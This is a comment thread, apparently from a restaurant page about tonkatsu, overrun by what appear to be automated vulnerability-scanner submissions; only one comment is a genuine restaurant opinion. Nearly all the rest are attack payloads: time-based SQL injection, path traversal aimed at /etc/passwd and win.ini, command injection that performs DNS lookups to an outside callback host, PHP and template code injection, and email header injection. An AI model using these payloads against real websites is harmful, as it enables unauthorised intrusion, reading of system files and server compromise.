re: Eric Yu
-5 OR 104=(SELECT 104 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: Eric Yu
bqT6SreD' OR 399=(SELECT 399 FROM PG_SLEEP(15))--
re: Eric Yu
R9bMj8tq') OR 246=(SELECT 246 FROM PG_SLEEP(15))--
re: Eric Yu
GoHNjGyX')) OR 699=(SELECT 699 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@vMwXJ
re: Eric Yu
tidAmBfW
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+113-113-1=0+0+0+1
re: Eric Yu
-1 OR 3+113-113-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
JBPWHELH'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 945=(SELECT 945 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 991=(SELECT 991 FROM PG_SLEEP(15))--
re: Eric Yu
S1UBBuUp' OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: Eric Yu
dDrqDGHx') OR 965=(SELECT 965 FROM PG_SLEEP(15))--
re: Eric Yu
IlGgPFW7')) OR 534=(SELECT 534 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@thoTL
re: Eric Yu
1tLK9v6tO
re: Eric Yu
response.write(9587170*9079948)
re: Eric Yu
'+response.write(9587170*9079948)+'
re: Eric Yu
"+response.write(9587170*9079948)+"
re: Eric Yu
%0abcc:074625.67-10183.67.1d6f9.19990.2@bxss.me
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10184.67.1d6f9.19990.2@bxss.me
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
${9999755+9999539}
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
echo gqqywk$()\ rprwrf\nz^xyu||a #' &echo gqqywk$()\ rprwrf\nz^xyu||a #|" &echo gqqywk$()\ rprwrf\nz^xyu||a #
re: Eric Yu
/etc/passwd
re: Eric Yu
&echo bjwhpp$()\ nxhvte\nz^xyu||a #' &echo bjwhpp$()\ nxhvte\nz^xyu||a #|" &echo bjwhpp$()\ nxhvte\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
|echo xevtma$()\ vqatty\nz^xyu||a #' |echo xevtma$()\ vqatty\nz^xyu||a #|" |echo xevtma$()\ vqatty\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
)
re: Eric Yu
(nslookup hitdkdtbqygafe6f15.bxss.me||perl -e "gethostbyname('hitdkdtbqygafe6f15.bxss.me')")
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
$(nslookup hitltdzyjrnwycaf7c.bxss.me||perl -e "gethostbyname('hitltdzyjrnwycaf7c.bxss.me')")
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
&nslookup hitlvmcggvcbqa4b5a.bxss.me&'\"`0&nslookup hitlvmcggvcbqa4b5a.bxss.me&`'
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
&(nslookup hitniihnsauil7cbcd.bxss.me||perl -e "gethostbyname('hitniihnsauil7cbcd.bxss.me')")&'\"`0&(nslookup hitniihnsauil7cbcd.bxss.me||perl -e "gethostbyname('hitniihnsauil7cbcd.bxss.me')")&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
|(nslookup hitdhacxbhgyyde4be.bxss.me||perl -e "gethostbyname('hitdhacxbhgyyde4be.bxss.me')")
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
`(nslookup hitklydwgjxwxabe69.bxss.me||perl -e "gethostbyname('hitklydwgjxwxabe69.bxss.me')")`
re: Eric Yu
file:///etc/passwd
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
;(nslookup hitpzyeqvrakl6853b.bxss.me||perl -e "gethostbyname('hitpzyeqvrakl6853b.bxss.me')")|(nslookup hitpzyeqvrakl6853b.bxss.me||perl -e "gethostbyname('hitpzyeqvrakl6853b.bxss.me')")&(nslookup hitpzyeqvrakl6853b.bxss.me||perl -e "gethostbyname('hitpzyeqvrakl6853b.bxss.me')")
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
'.gethostbyname(lc('hitnj'.'xyxfaukk2f1ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(78).chr(100).chr(68).'
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
".gethostbyname(lc("hitcw"."clqzwwhmfa9ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(67).chr(104).chr(84)."
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
/etc/shells
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
bxss.me
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(106).concat(82).concat(108).concat(80)+(require"socket"
Socket.gethostbyname("hitbq"+"ffevxsieb29d3.bxss.me.")[3].to_s)+"
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(120).concat(77).concat(104).concat(66)+(require'socket'
Socket.gethostbyname('hitnt'+'qplekzxn95d52.bxss.me.')[3].to_s)+'
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
'"
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
<!--
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+757-757-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+757-757-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+93-93-1=0+0+0+1
re: Eric Yu
-1 OR 3+93-93-1=0+0+0+1
re: Eric Yu
-1' OR 2+935-935-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+935-935-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+37-37-1=0+0+0+1 or 'uzMm9r3Y'='
re: Eric Yu
-1' OR 3+37-37-1=0+0+0+1 or 'uzMm9r3Y'='
re: Eric Yu
-1" OR 2+391-391-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+391-391-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
G6B9XhMQ'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 91=(SELECT 91 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 819=(SELECT 819 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: Eric Yu
s6EK8y14' OR 88=(SELECT 88 FROM PG_SLEEP(15))--
re: Eric Yu
OL7uTQXm') OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: Eric Yu
nConVpWL')) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@bOChc
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
@mirugai Totally agreed that tonkatsu is probably the cuisine with the biggest gap when looking overseas. Here in Singapore, Saboten would be considered one of the better tonkatsu joints, haha.
Amongst the list, Keita has got to be one of my favourites simply because they let you choose the kind of frying you prefer (lighter or darker batter). The pork quality is also fantastic, yet the price remains noticeably more affordable than Narikura or Chawanbu.
re: JJ
WeyTOjal
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+720-720-1=0+0+0+1
re: JJ
-1 OR 3+720-720-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
3dJOUzvl'; waitfor delay '0:0:15' --
re: JJ
-5 OR 603=(SELECT 603 FROM PG_SLEEP(15))--
re: JJ
-5) OR 432=(SELECT 432 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
re: JJ
cI5JgEDM' OR 466=(SELECT 466 FROM PG_SLEEP(15))--
re: JJ
Z0FialBp') OR 883=(SELECT 883 FROM PG_SLEEP(15))--
re: JJ
NlBqj9cX')) OR 887=(SELECT 887 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@JvwKj
re: JJ
Ix7Fy0KS
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+936-936-1=0+0+0+1
re: JJ
-1 OR 3+936-936-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
vDDlx0Gn'; waitfor delay '0:0:15' --
re: JJ
-5 OR 282=(SELECT 282 FROM PG_SLEEP(15))--
re: JJ
-5) OR 421=(SELECT 421 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 150=(SELECT 150 FROM PG_SLEEP(15))--
re: JJ
KikdSB6Q' OR 951=(SELECT 951 FROM PG_SLEEP(15))--
re: JJ
PLsMKHbt') OR 798=(SELECT 798 FROM PG_SLEEP(15))--
re: JJ
O8Sxst29')) OR 776=(SELECT 776 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@I3UrS
re: JJ
1ls8VqmGO
re: JJ
response.write(9819601*9956279)
re: JJ
'+response.write(9819601*9956279)+'
re: JJ
"+response.write(9819601*9956279)+"
re: JJ
%0abcc:074625.67-10172.67.98986.19990.2@bxss.me
re: JJ
to@example.com>%0d%0abcc:074625.67-10173.67.98986.19990.2@bxss.me
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
${9999868+9999836}
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
echo dvmviv$()\ fblqkm\nz^xyu||a #' &echo dvmviv$()\ fblqkm\nz^xyu||a #|" &echo dvmviv$()\ fblqkm\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
&echo gbsyey$()\ vonvcu\nz^xyu||a #' &echo gbsyey$()\ vonvcu\nz^xyu||a #|" &echo gbsyey$()\ vonvcu\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
|echo gbhnbq$()\ nymqpw\nz^xyu||a #' |echo gbhnbq$()\ nymqpw\nz^xyu||a #|" |echo gbhnbq$()\ nymqpw\nz^xyu||a #
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
(nslookup hitdyxgrquhwjc95a7.bxss.me||perl -e "gethostbyname('hitdyxgrquhwjc95a7.bxss.me')")
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
)
re: JJ
$(nslookup hitctpwifnbbdde49f.bxss.me||perl -e "gethostbyname('hitctpwifnbbdde49f.bxss.me')")
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
!(()&&!|*|*|
re: JJ
&nslookup hitjwndbgtxib11ceb.bxss.me&'\"`0&nslookup hitjwndbgtxib11ceb.bxss.me&`'
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
&(nslookup hitttmyozemcx0056b.bxss.me||perl -e "gethostbyname('hitttmyozemcx0056b.bxss.me')")&'\"`0&(nslookup hitttmyozemcx0056b.bxss.me||perl -e "gethostbyname('hitttmyozemcx0056b.bxss.me')")&`'
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
|(nslookup hitvdsscbhlpe359e1.bxss.me||perl -e "gethostbyname('hitvdsscbhlpe359e1.bxss.me')")
re: JJ
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.